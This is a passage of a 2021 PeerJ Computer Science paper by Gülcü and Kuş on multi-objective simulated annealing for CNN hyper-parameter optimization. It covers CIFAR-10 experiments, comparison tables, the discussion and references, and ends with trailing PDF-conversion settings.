PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 14/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ Kruskal–Wallis h-test to determine whether there are significant differences. This test is applied separately for GD, Spread and the front size metrics, but none of those metrics proved a significant difference among the fronts. Therefore, we selected a cooling rate of 0.85 arbitrarily. Cifar10 dataset In this study, CIFAR-10 dataset (Krizhevsky & Hinton, 2009) which is the most widely- used natural object classification benchmark dataset used in HPO and NAS studies is selected as the benchmark dataset. Considering the computational cost and the hardware requirement to run the experiments, the selected dataset should be simple, yet complex enough to reveal the differences among different methods or the network configurations. Many studies consider this dataset as the only benchmark dataset (Lu et al., 2019a; Wang et al., 2019; Elsken, Metzen & Hutter, 2018) due to the fact that it is simpler than very large-scale ImageNet dataset (Russakovsky et al., 2015), but still difficult enough to be used to evaluate the performance of different approaches. CIFAR-10 dataset consists of 60,000 32 × 32 color images in 10 classes, and each class contains 6,000 images. The whole dataset is divided into training and test datasets of 50,000 and 10,000 images, respectively. In most of the studies, CIFAR-10 original training set is split into two sets (80–20%) to create training and validation sets which are used during the search process. We follow a similar approach with only difference is that, only half of the original training dataset is used during a MOSA search process. In order to speed up the search process, a reduced sample of 50% of the original training samples are Table 3 The number of outer and inner iterations calculated for different cooling rate values under the same budget and temperature values. Iteration budget Tinit Tfinal Cooling rate #Outer iterations #Inner iterations 250 0.577 0.12 0.99 156.2 1.6 250 0.577 0.12 0.95 30.6 8.1 250 0.577 0.12 0.9 14.9 16.7 250 0.577 0.12 0.85 9.6 25.8 250 0.577 0.12 0.8 7.0 35.5 Table 2 Worsening moves encountered during burn-in period. Iteration no F(X) F(X′) |A| F(X′)–F(X) ΔF 3 1 4 3 3 0.600 5 5 4 4 4 0.667 9 1 2 5 1 0.143 11 1 6 6 5 0.625 13 1 7 7 6 0.667 ⋮ ⋮ ⋮ ⋮ ⋮ ⋮ Average 2.69 5.94 6.02 3.25 0.40 Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 15/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ selected randomly; and 10% of this reduced sample is used as the reduced validation set. Although this approach might have some negative effects on the performance evaluation of a given configuration; we believe this effect is minimal due to the fact that the aim of the search process is not to accurately measure the error rate of a configuration, but to perform a fair comparison to discriminate good and bad configurations. The original CIFAR-10 test set is never used during the MOSA search process, and it is only used to obtain the actual test accuracy values of the selected configurations on the final trade-off front. Other image classification datasets such as MNIST (LeCun et al., 1998), FashionMNIST (Xiao, Rasul & Vollgraf, 2017) and EMNIST-Balanced (Cohen et al., 2017) are being criticized for having reached their limits and failing to reveal the differences between the algorithms (Lu et al., 2019a). Training and evaluation during the search process During the search process, the classification performance of a generated network configuration is approximated by following the early stopping approach. Early stopping is used as a popular method to prevent over-fitting in classical machine learning; however, in Figure 3 Comparison of MOSA fronts under different cooling rates with (A) random seed: 10, (B) random seed: 20, (C) random seed: 30. Full-size DOI: 10.7717/peerj-cs.338/fig-3 Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 16/27 http://dx.doi.org/10.7717/peerj-cs.338/fig-3 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ the context of AutoML, and in particular for HPO, it is usually used to cut down the training time for unpromising configurations. Based on the evaluations on the validation set, if a poor early-stage performance is observed, then the training process is terminated, and the search moves to a new configuration. This approach not only cuts down total running time of the HPO method, but also introduces noise and bias to the estimation, as some configurations with bad early-stage performance may eventually turn out to be good after sufficient training (Yao et al., 2019). At each MOSA iteration, a newly generated configuration is trained using the training split of the original training set and it is evaluated on the validation set which is the test split of the original training set. Xavier weight initializer and Adam optimizer with a learning rate of 0.001 is used, and the batch size is selected as 32. For a given configuration, if the best loss achieved on the validation set is not improved after three consecutive epochs, then the training process is terminated. A configuration is allowed to be trained at most 100 epochs. In a MOSA run with 500 iterations, we observe that the average number of epochs is 23.166. This epoch count seems to be reasonable considering the epoch count used in similar studies: minimum of 36 epochs in (Lu et al., 2019a) and 20 epochs in Elsken, Metzen & Hutter (2018). All experiments are performed on a single Nvidia 2080 Ti GPU using Keras (Chollet et al., 2015), and the code and the raw evaluation results are available at https://github.com/zekikus/MOSA-cnn-hyperparams-optimization. Training after the search process The MOSA algorithm is run for 500 iterations, and each run is repeated for three times using different random seeds. From each of three trade-off fronts, some non-dominated configurations are selected and then trained for longer epochs on the original CIFAR-10 training dataset in order to measure their actual classification performance. From each front, three configurations with the lowest error rates are selected and each solution is trained for 400 epochs with a batch size of 128 using standard stochastic gradient descent (SGD) back-propagation algorithm with the following parameter values: learning rate = 0.08, decay = 5E−4 and momentum = 0.9 (default values in Keras). As mentioned earlier, the original test set is never used during training; it is only used at this stage to test the performance of the selected networks. To improve the test performance, we only utilized an online augmentation routine that is used in many peer studies. This process which is also called augmentation on the fly is especially preferred for larger datasets where an increase in size cannot be afforded. Sequential transformations of padding, random crop and horizontal flip are applied on the mini- batches during training (He et al., 2016; Huang et al., 2017). In some studies, training performance is further improved by some additional operations. For example, (Lu et al., 2019b) appends an auxiliary head classifier to the architecture, but we did not follow these approaches that require manual intervention after the search process. Results analysis We first present the objective space distribution of all configurations obtained during each independent run of the MOSA. In order to show the search ability of the proposed Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 17/27 https://github.com/zekikus/MOSA-cnn-hyperparams-optimization http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ algorithm, the MOSA search space is compared to the search space generated by the single-objective SA method also to the search space generated by Random Search (RS) method in which all solutions are accepted regardless of their objective values. Final fronts are also compared in terms of the front metrics given in “Performance Evaluation Criteria”. Then, some solutions in the final front are selected to be trained for longer epochs in order to perform post search analysis. The configurations generated by the MOSA are compared to both human designed state-of-the-art configurations and the configurations generated by other search methods like evolutionary algorithms in terms of the test error, the number of FLOPs, the number of parameters and also the search cost which is reported as GPU-days. Fronts analysis A MOSA search is repeated three times with different initial random seeds, and the objective space distribution of all configurations encountered during each of those search processes are illustrated in Fig. 4. In all of those runs, SA especially focuses on the areas with small classification error but with large number of FLOPs, es expected. In order to show the search ability of the MOSA over the SA, we compare the final fronts generated by each method in terms of closeness to the Pareto-optimal front and the diversity of the Figure 4 Comparison of MOSA and SA search ability in terms of objective space distribution and the Pareto fronts with (A) random seed: 10, (B) random seed: 20, (C) random seed: 30. Full-size DOI: 10.7717/peerj-cs.338/fig-4 Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 18/27 http://dx.doi.org/10.7717/peerj-cs.338/fig-4 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ solutions along the fronts. The configurations generated by the SA seem to be much complex than the configurations generated by the MOSA which also takes into account the complexity as the other objective. Due to the large computational time requirement (at least 2 × longer), SA is run only once. As there is no archive mechanism in the SA, the final SA front is formed by selecting all non-dominated configurations encountered during a single run. The MOSA and the SA fronts are also shown in Fig. 4 along with the objective space distributions of those algorithms. In addition to making comparison using graphical plots, we used the metrics given in “Performance Evaluation Criteria” to compare the fronts generated by each approach in a quantitative manner. These metrics are as follows: Generational Distance (GD), Spread (S) and Spacing (Sp) metrics. The comparison results using these metrics are given in Table 4. In the table, MOSA_01 represents the MOSA front obtained at the first run, and MOSA_02 represents the MOSA front obtained at the second run and so on. GD of each front is calculated with respect to A� which is formed by combining all four fronts. S of each front is calculated with respect to the extreme points considering again all four fronts. Sp metric is calculated for each front separately, because it measures within front distribution quality of a given front. The search ability of the proposed method is also validated by comparing it to the RS method. The same comparisons performed between the MOSA and the SA are applied to compare the MOSA and the RS methods. When the MOSA and the RS solutions are combined to create A�, none of the RS front solutions take place in A� as in the case of SA. A� is composed of only the solutions coming from the MOSA which means that GD calculations are made against the same reference front; therefore we decided to present all these comparison results on the same table, Table 4. Figure 5 illustrates the objective space distribution and the fronts obtained by the MOSA and the RS methods. After search analysis In order to measure the actual classification performance of the configurations generated by the MOSA method, nine configurations are selected and subjected to longer training using the original CIFAR-10 training dataset as detailed in “Training After the Search Process”. Among these nine configurations, the networks with the lowest error rates are selected for comparison with the networks reported in the literature. As the MOSA algorithm considers two objectives, namely, error rate and the FLOPs, during the search process, a multi-objective comparison with respect to the front evaluation metrics should be performed for a fair comparison. Unfortunately, most of the studies do not Table 4 Evaluation of the final fronts with respect to three metrics and the number of solutions. MOSA_01 MOSA_02 MOSA_03 SA RS GD 0.0011 0.0629 0.0387 0.0765 0.0286 S (spread) 0.7127 0.7944 0.5867 0.6681 0.4755 Sp (spacing) 0.0891 0.1483 0.1384 0.1519 0.1268 #Solutions 11 10 10 7 10 Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 19/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ report the objective values of the solutions in the final frontiers, or they consider different objective functions to estimate the complexity of the generated networks. In some studies, computational complexity is measured as computational time in GPU-days. However, a comparison with respect to computational time may not be reliable due to some external factors such as the temperature in the computing environment, even if the same GPU models are used for the experiments. Therefore, the number of FLOPs that a network carries out during a forward pass is the most reliable complexity measure. In Table 5, the final performance of three MOSA configurations in terms of both objectives are presented. In addition, a graphical comparison is given in Fig. 6 where the dominance relation between different configurations can be easily noticed. As in “Fronts Analysis”, a comparison to the configurations found with the single objective SA algorithm is also performed and the results are presented in the table in order to show the effect of using a multi-objective solution approach for this bi-objective optimization problem. From the SA trade-off front, three configurations with the lowest error rate are selected for longer training, and the performance of each configuration is reported in the table. The same approach is followed for the RS, as well. Other search generated architectures are included in the second part of the table. In the table, the accuracy, the number of FLOPs and the number of parameters columns all represent the values reported in the Figure 5 Visual comparison of MOSA and RS search ability in terms of objective space distribution and the Pareto fronts with (A) random seed: 10, (B) random seed: 20, (C) random seed:30. Full-size DOI: 10.7717/peerj-cs.338/fig-5 Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 20/27 http://dx.doi.org/10.7717/peerj-cs.338/fig-5 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ original papers. As stated before, we did not consider the search cost in terms of time in the comparisons; however, in order to give an idea about the search cost of the MOSA algorithm, we run one MOSA search on the same GPU as in NSGA-Net (Lu et al., 2019a). We observe that MOSA takes 50 hours on a single NVIDIA 1080Ti GPU, which equals to 2.08 GPU-days, whereas it takes 8 GPU-days for NSGA-Net. A comparison of the MOSA configurations to the human designed state-of-the-art configurations are also performed. In order to be able to make a fair comparison, especially Table 5 Comparison of MOSA architectures to other search generated architectures. Architecture Search method Test accuracy (%) FLOPs (M) Parameters (M) MOSA_soln1 MOSA 91.97 16.2 3.329 MOSA_soln2 MOSA 91.52 1.7 0.854 MOSA_soln3 MOSA 91.14 1.2 0.641 SA_soln1 SA 92.65 6.8 5.9 SA_soln2 SA 92.85 11.7 3.572 SA_soln3 SA 90.04 7.1 3.45 RS_soln1 RS 88.27 4.1 2.052 RS_soln2 RS 91.25 5.1 2.603 RS_soln3 RS 86.26 1.7 0.887 NSGA-Net (Lu et al., 2019b) EA 96.15 1290 3.3 PPP-Net (Dong et al., 2018) EA 95.64 1364 11.39 AmoebaNet-A + cutout (Real et al., 2019) EA 97.23 533 3.3 NASNet-A + cutout (Zoph et al., 2018) RL 97.09 532 3.2 Figure 6 Comparison of the final performance of the networks in terms of both the error rate and the number of FLOPs. Full-size DOI: 10.7717/peerj-cs.338/fig-6 Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 21/27 http://dx.doi.org/10.7717/peerj-cs.338/fig-6 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ in terms of test accuracy, each of these state-of the-art architectures are rebuilt and trained using the same augmentation techniques as in the MOSA training process. The results are presented in Table 6. DISCUSSION The MOSA and the SA algorithms are allowed to run for the same number of iterations. An archive is maintained to collect all non-dominated solutions that have been encountered throughout the search process. The MOSA also incorporates a return-to-base strategy which allows further exploitation of the archive solutions. Moreover, it uses a dominance-based acceptance rule as the decision criterion. CIFAR-10 dataset which is the most widely-used natural object classification benchmark dataset is used to compare the performance of different approaches. We first compare the search ability of the MOSA and the SA algorithms using the trade-off fronts obtained by each method. Objective space distribution of all configurations encountered during a SA search process is used to form the trade-off front consisting of only non-dominated solutions. The MOSA and the SA fronts are then compared with respect to three multi-objective evaluation metrics. According to the results based on generational distance, spread and spacing metrics, the MOSA algorithm is able to generate better fronts than the SA method. When the objective space distribution of the two methods are compared visually, one can see that the single-objective SA focuses on the objective space with small error rates regardless of the number of FLOPs, as expected. On the other hand, the MOSA focuses on the objective space with both small error rates and small number of FLOPs. When the two algorithms are compared in terms of font cardinality, one can see that the MOSA is able generate more solutions. When the MOSA fronts are compared to the RS front, it is observed that each of three MOSA front yields in better spread value than the RS front. But for other metrics, while the best value is always achieved by a MOSA front, the RS yields in competitive results. As this front analysis is important in terms of providing some indications about the search ability of the algorithms, a more reliable comparison can be made after training the solutions in the trade-off front for longer epochs in order to get their accuracy on the original test set. However, due to the computational cost of this training process, only the selected solutions are allowed to run for longer training epochs. When the MOSA and the SA configurations are compared after this long training process, Table 6 Comparison of MOSA architectures to human designed state of the art architectures. Architecture Test accuracy (%) FLOPs (M) Parameters (M) MOSA_soln1 91.97 16.2 3.329 MOSA_soln2 91.52 1.7 0.854 MOSA_soln3 91.14 1.2 0.641 LeNet-5 (LeCun et al., 1990) 71.86 0.162 0.081 VGGNet-16 (Simonyan & Zisserman, 2014) 86.38 67.251 33.638 ResNet-50 (He et al., 2016) 76.01 47.052 23.604 DenseNet-32 (Huang et al., 2017) 89.38 2.894 0.494 Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 22/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ the results show that the SA performs slightly better than the MOSA under single-objective setting. However, when the complexity in terms of both FLOPs count and the number of parameters is considered, the MOSA solutions are superior to SA solutions. When it comes to comparison to the RS solutions, the results suggest that all RS solutions are dominated by at least one MOSA solution. The MOSA configurations are also compared to the configurations obtained by other search methods like evolutionary algorithms and reinforcement learning methods. Although the results might suggest a poor MOSA performance in terms of test accuracy, the other objective, FLOPs, should also be taken into account for a fair comparison. Moreover, most of these approaches include complex augmentation strategies in order to boost the final test accuracy. When both the test accuracy and the complexity are considered, it is shown that the MOSA configurations are not dominated by any of those architectures, and the proposed method can be of great use when the computational complexity is as important as the test accuracy. It can also be concluded the MOSA which is a single-stage algorithm is able to generate high quality solutions under limited computational resources. CONCLUSIONS In this study, we model a CNN hyper-parameter optimization problem as bi-objective optimization problem considering two competing objectives, namely, the classification accuracy and the computational complexity which is measured in terms of the number of floating point operations. For this bi-criteria hyper-parameter optimization problem, we develop a MOSA algorithm with the aim of obtaining high-quality configurations in terms of both objectives. CIFAR-10 is selected as the benchmark dataset, and the MOSA trade-off fronts obtained for this dataset are compared to the fronts generated by a single-objective SA algorithm with respect to three front evaluation metrics. The results show that the MOSA algorithm is able to search the objective space more effectively than the SA method. Some non-dominated solutions generated by both the MOSA and the SA search processes are selected for longer training in order to obtain their actual accuracy values on the original test set. The results again suggest that the MOSA performs better than SA under bi-objective setting. The MOSA configurations also compared to the configurations obtained by other search methods like population-based algorithms and reinforcement learning methods. It can be concluded that the MOSA which is a single stage algorithm is able to generate high quality solutions under limited computational resources, and it can be of great use when the computational complexity and time are as important as the accuracy. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 23/27 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ Author Contributions Ayla Gülcü conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Zeki Kuş conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code and raw results are available at GitHub: https://github.com/zekikus/MOSA-cnn- hyperparams-optimization. REFERENCES Back T. 1996. Evolutionary algorithms in theory and practice: evolution strategies, evolutionary programming, genetic algorithms (First Press). New York: Oxford University Press. Bandyopadhyay S, Saha S, Maulik U, Deb K. 2008. A simulated annealing-based multiobjective optimization algorithm: AMOSA. IEEE Transactions on Evolutionary Computation 12(3):269–283. Bergstra J, Bengio Y. 2012. Random search for hyper-parameter optimization. Journal of Machine Learning Research 13:281–305. Chollet F, Others. 2015. Keras. GitHub. Available at https://github.com/fchollet/keras. Cohen G, Afshar S, Tapson J, Van Schaik A. 2017. EMNIST: extending MNIST to handwritten letters. In: 2017 International Joint Conference on Neural Networks (IJCNN). Piscataway: IEEE, 2921–2926. Czyzżak P, Jaszkiewicz A. 1998. Pareto simulated annealing—a metaheuristic technique for multiple-objective combinatorial optimization. Journal of Multi-Criteria Decision Analysis 7(1):34–47 DOI 10.1002/(SICI)1099-1360(199801)7:1<34::AID-MCDA161>3.0.CO;2-6. Deb K. 2001. Multi-objective optimization using evolutionary algorithms. Vol. 16. Hoboken: John Wiley & Sons. Dong JD, Cheng AC, Juan DC, Wei W, Sun M. 2018. Ppp-net: platform-aware progressive search for pareto-optimal neural architectures. In: ICLR Workshop (2018). Available at https://openreview.net/pdf?id=B1NT3TAIM. Eberhart R, Kennedy J. 1995. Particle swarm optimization. In: Proceedings of the IEEE International Conference on Neural Networks. Vol. 4. Piscataway: IEEE, 1942–1948. Elsken T, Metzen JH, Hutter F. 2018. Efficient multi-objective neural architecture search via lamarckian evolution. ArXiv arXiv:1804.09081. Elsken T, Metzen JH, Hutter F. 2019. Neural architecture search: a survey. ArXiv arXiv:1808.05377. Feurer M, Hutter F. 2019. Hyperparameter optimization. In: Automated Machine Learning. Cham: Springer, 3–33. Goodfellow I, Bengio Y, Courville A. 2016. Deep learning. Vol. 1. Cambridge: MIT press. Gülcü A, Kuş Z. 2020. Hyper-parameter selection in convolutional neural networks using microcanonical optimization algorithm. IEEE Access 8:52528–52540 DOI 10.1109/ACCESS.2020.2981141. Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 24/27 https://github.com/zekikus/MOSA-cnn-hyperparams-optimization https://github.com/zekikus/MOSA-cnn-hyperparams-optimization https://github.com/fchollet/keras http://dx.doi.org/10.1002/(SICI)1099-1360(199801)7:1%3C34::AID-MCDA161%3E3.0.CO;2-6 https://openreview.net/pdf?id=B1NT3TAIM http://dx.doi.org/10.1109/ACCESS.2020.2981141 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ He K, Zhang X, Ren S, Sun J. 2016. Deep residual learning for image recognition. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 770–778. Hoffman MW, Shahriari B. 2014. Modular mechanisms for Bayesian optimization. In: Proceedings NIPS Workshop Bayesian Optimization. 1–5. Holland JH. 1992. Genetic algorithms. Scientific American 267(1):66–73 DOI 10.1038/scientificamerican0792-66. Huang G, Liu Z, Van Der Maaten L, Weinberger KQ. 2017. Densely connected convolutional networks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 4700–4708. Kim YH, Reddy B, Yun S, Seo C. 2017. Nemo: neuro-evolution with multiobjective optimization of deep neural network for speed and accuracy. In: JMLR: Workshop and Conference Proceedings. Vol. 1. 1–8. Kirkpatrick S, Gelatt CD, Vecchi MP. 1983. Optimization by simulated annealing. Science 220(4598):671–680 DOI 10.1126/science.220.4598.671. Konak A, Coit DW, Smith AE. 2006. Multi-objective optimization using genetic algorithms: a tutorial. Reliability Engineering & System Safety 91(9):992–1007 DOI 10.1016/j.ress.2005.11.018. Krizhevsky A, Hinton G. 2009. Learning multiple layers of features from tiny images. Technical Report. University of Toronto. Available at https://www.cs.toronto.edu/~kriz/learning- features-2009-TR.pdf. LeCun Y, Boser BE, Denker JS, Henderson D, Howard RE, Hubbard WE, Jackel LD. 1990. Handwritten digit recognition with a back-propagation network. In: Advances in neural information processing systems. Burlington: Morgan Kaufmann, 396–404. LeCun Y, Bottou L, Bengio Y, Haffner P. 1998. Gradient-based learning applied to document recognition. Proceedings of the IEEE 86(11):2278–2324 DOI 10.1109/5.726791. Li L, Talwalkar A. 2020. Random search and reproducibility for neural architecture search. In: Uncertainty in Artificial Intelligence. Amsterdam: Elsevier, 367–377. Liu H, Simonyan K, Vinyals O, Fernando C, Kavukcuoglu K. 2018. Hierarchical representations for efficient architecture search. ArXiv arXiv:1711.00436. Liu H, Simonyan K, Yang Y. 2018. Darts: differentiable architecture search. Available at http://arxiv.org/abs/1806.09055. Lu Z, Whalen I, Boddeti V, Dhebar Y, Deb K, Goodman E, Banzhaf W. 2019a. NSGA-net: neural architecture search using multi-objective genetic algorithm. In: Proceedings of the Genetic and Evolutionary Computation Conference. 419–427. Lu Z, Whalen I, Dhebar Y, Deb K, Goodman E, Banzhaf W, Boddeti VN. 2019b. Multi-criterion evolutionary design of deep convolutional neural networks. ArXiv arXiv:1912.01369. Ma B, Li X, Xia Y, Zhang Y. 2020. Autonomous deep learning: a genetic DCNN designer for image classification. Neurocomputing 379:152–161 DOI 10.1016/j.neucom.2019.10.007. Real E, Aggarwal A, Huang Y, Le QV. 2019. Regularized evolution for image classifier architecture search. In: Proceedings of the AAAI Conference on Artificial Intelligence. Vol. 33. 4780–4789 DOI 10.1609/aaai.v33i01.33014780. Real E, Moore S, Selle A, Saxena S, Suematsu YL, Tan J, Le Q, Kurakin A. 2017. Large-scale evolution of image classifiers. In: Proceedings of the 34th International Conference on Machine Learning. Vol. 70. 2902–2911. Russakovsky O, Deng J, Su H, Krause J, Satheesh S, Ma S, Huang Z, Karpathy A, Khosla A, Bernstein M, Berg AC, Fei-Fei L. 2015. Imagenet large scale visual recognition challenge. International Journal of Computer Vision 115(3):211–252. Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 25/27 http://dx.doi.org/10.1038/scientificamerican0792-66 http://dx.doi.org/10.1126/science.220.4598.671 http://dx.doi.org/10.1016/j.ress.2005.11.018 https://www.cs.toronto.edu/~kriz/learning-features-2009-TR.pdf https://www.cs.toronto.edu/~kriz/learning-features-2009-TR.pdf http://dx.doi.org/10.1109/5.726791 http://arxiv.org/abs/1806.09055 http://dx.doi.org/10.1016/j.neucom.2019.10.007 http://dx.doi.org/10.1609/aaai.v33i01.33014780 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ Schott JR. 1995. Fault tolerant design using single and multi-criteria genetic algorithms. Master’s thesis, Boston, MA: Department of Aeronautics and Astronautics, Massachusetts Institute of Technology. Available at http://hdl.handle.net/1721.1/11582. Simonyan K, Zisserman A. 2014. Very deep convolutional networks for large-scale image recognition. Available at http://arxiv.org/abs/1409.1556. Simonyan K, Zisserman A. 2015. Very deep convolutional networks for large-scale image recognition. ArXiv arXiv:1409.1556. Smith KI, Everson RM, Fieldsend JE. 2004. Dominance measures for multi-objective simulated annealing. In: Proceedings of the 2004 Congress on Evolutionary Computation (IEEE Cat. No. 04TH8753). Vol. 1. Piscataway: IEEE, 23–30. Smith KI, Everson RM, Fieldsend JE, Murphy C, Misra R. 2008. Dominance-based multiobjective simulated annealing. IEEE Transactions on Evolutionary Computation 12(3):323–342 DOI 10.1109/TEVC.2007.904345. Springenberg JT, Dosovitskiy A, Brox T, Riedmiller M. 2014. Striving for simplicity: the all convolutional net. Available at http://arxiv.org/abs/1412.6806. Suganuma M, Shirakawa S, Nagao T. 2017. A genetic programming approach to designing convolutional neural network architectures. In: Proceedings of the Genetic and Evolutionary Computation Conference. 497–504. Suman B. 2004. Study of simulated annealing based algorithms for multiobjective optimization of a constrained problem. Computers & Chemical Engineering 28(9):1849–1871 DOI 10.1016/j.compchemeng.2004.02.037. Suman B, Kumar P. 2006. A survey of simulated annealing as a tool for single and multiobjective optimization. Journal of the Operational Research Society 57(10):1143–1160 DOI 10.1057/palgrave.jors.2602068. Sun Y, Xue B, Zhang M, Yen GG. 2019a. Evolving deep convolutional neural networks for image classification. In: IEEE Transactions on Evolutionary Computation. Piscataway: IEEE. Sun Y, Xue B, Zhang M, Yen GG. 2019b. Completely automated CNN architecture design based on blocks. IEEE Transactions on Neural Networks and Learning Systems 31:1242–1254. Suppapitnarm A, Seffen KA, Parks GT, Clarkson PJ. 2000. A simulated annealing algorithm for multiobjective optimization. Engineering Optimization 33(1):59–85 DOI 10.1080/03052150008940911. Ulungu EL, Teghem JFPH, Fortemps PH, Tuyttens D. 1999. MOSA method: a tool for solving multiobjective combinatorial optimization problems. Journal of Multi-Criteria Decision Analysis 8(4):221–236 DOI 10.1002/(SICI)1099-1360(199907)8:4<221::AID-MCDA247>3.0.CO;2-O. Van Veldhuizen DA, Lamont GB. 2000. Multiobjective evolutionary algorithms: Analyzing the state-of-the-art. Evolutionary Computation 8(2):125–147. Wang B, Sun Y, Xue B, Zhang M. 2019. Evolving deep neural networks by multi-objective particle swarm optimization for image classification. In: Proceedings of the Genetic and Evolutionary Computation Conference. 490–498. Weng CH, Lai YH, Lai SH. 2016. Driver drowsiness detection via a hierarchical temporal deep belief network. In: Asian Conference on Computer Vision. Cham: Springer, 117–133. Xiao H, Rasul K, Vollgraf R. 2017. Fashion-mnist: a novel image dataset for benchmarking machine learning algorithms. Available at http://arxiv.org/abs/1708.07747. Xie L, Yuille A. 2017. Genetic cnn. In: Proceedings of the IEEE International Conference on Computer Vision. Piscataway: IEEE, 1379–1388. Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 26/27 http://hdl.handle.net/1721.1/11582 http://arxiv.org/abs/1409.1556 http://dx.doi.org/10.1109/TEVC.2007.904345 http://arxiv.org/abs/1412.6806 http://dx.doi.org/10.1016/j.compchemeng.2004.02.037 http://dx.doi.org/10.1057/palgrave.jors.2602068 http://dx.doi.org/10.1080/03052150008940911 http://dx.doi.org/10.1002/(SICI)1099-1360(199907)8:4%3C221::AID-MCDA247%3E3.0.CO;2-O http://arxiv.org/abs/1708.07747 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ Yamasaki T, Honma T, Aizawa K. 2017. Efficient optimization of convolutional neural networks using particle swarm optimization. In: 2017 IEEE Third International Conference on Multimedia Big Data. Piscataway: IEEE, 70–73. Yao Q, Wang M, Chen Y, Dai W, Li Y-F, Tu W-W, Yang Q, Yang Y. 2019. Taking human out of learning applications: a survey on automated machine learning. ArXiv arXiv:1810.13306. Zitzler E, Deb K, Thiele L. 2000. Comparison of multiobjective evolutionary algorithms: empirical results. Evolutionary Computation 8(2):173–195 DOI 10.1162/106365600568202. Zitzler E, Thiele L, Laumanns M, Fonseca CM, Da Fonseca VG. 2003. Performance assessment of multiobjective optimizers: an analysis and review. IEEE Transactions on Evolutionary Computation 7(2):117–132 DOI 10.1109/TEVC.2003.810758. Zoph B, Le QV. 2016. Neural architecture search with reinforcement learning. ArXiv arXiv:1611.01578. Zoph B, Vasudevan V, Shlens J, Le QV. 2018. Learning transferable architectures for scalable image recognition. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 8697–8710. Gülcü and Kuş (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.338 27/27 http://dx.doi.org/10.1162/106365600568202 http://dx.doi.org/10.1109/TEVC.2003.810758 http://dx.doi.org/10.7717/peerj-cs.338 https://peerj.com/computer-science/ Multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks Introduction Materials and Methods Results Discussion Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true 